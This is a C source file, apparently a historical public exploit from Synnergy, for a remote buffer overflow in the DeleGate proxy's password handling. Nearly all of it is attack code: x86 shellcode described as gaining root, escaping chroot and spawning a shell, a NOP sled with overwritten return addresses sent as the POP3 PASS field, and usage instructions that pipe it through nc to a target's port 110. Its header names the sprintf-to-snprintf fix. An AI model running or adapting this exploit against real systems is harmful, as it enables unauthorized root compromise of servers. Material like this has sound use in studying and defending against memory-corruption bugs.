/*
   Description: Delegate remote exploit, based on freebsd.org advisory.
   Comments   : exploit the bof in access.c - sprintf(auth,"%s",pass);
   Solution   : Rewrite all the sprintf()'s with snprintf()'s.

    Exploit by dethy
  [ www.synnergy.net ] 

*/
#include <stdio.h>
 
#define BUFFERSIZE 242	// overflow 256 byte buffer
#define NOP 0x90
#define OFFSET 0xbfffe074

/* hex for euid=0 -> uid=0 - > chroot() -> shell */
char hellcode[]=  
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
"\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
"\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
"\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
"\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
"\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
"\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
"\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
"\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";

  
void usage(char *progname) {
 fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
 exit(1);
} 

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int i;
  
 fprintf(stderr,"\nDelegate Remote Exploit - www.synnergy.net\n\n");

 if (argc<3) usage(argv[0]);

 if (argc==4) offset+=atol(argv[3]);

 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-strlen(hellcode)-16);
 ptr+=sizeof(buffer)-strlen(hellcode)-16;
 memcpy(ptr,hellcode,strlen(hellcode));
 ptr+=strlen(hellcode);
 long_ptr=(unsigned long*)ptr;
 for(i=0;i<4;i++) *(long_ptr++)=offset;
 ptr=(char *)long_ptr;
 *ptr='\0';

 fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
 fprintf(stderr,"Offset: 0x%lx\n\n",offset);

 
 printf("USER %s\n",argv[1]);
 sleep(1);
 printf("PASS %s\n",buffer); 	// spawned shell!
 sleep(1);
 printf("uname -a; id\n");
 
 return(0);
}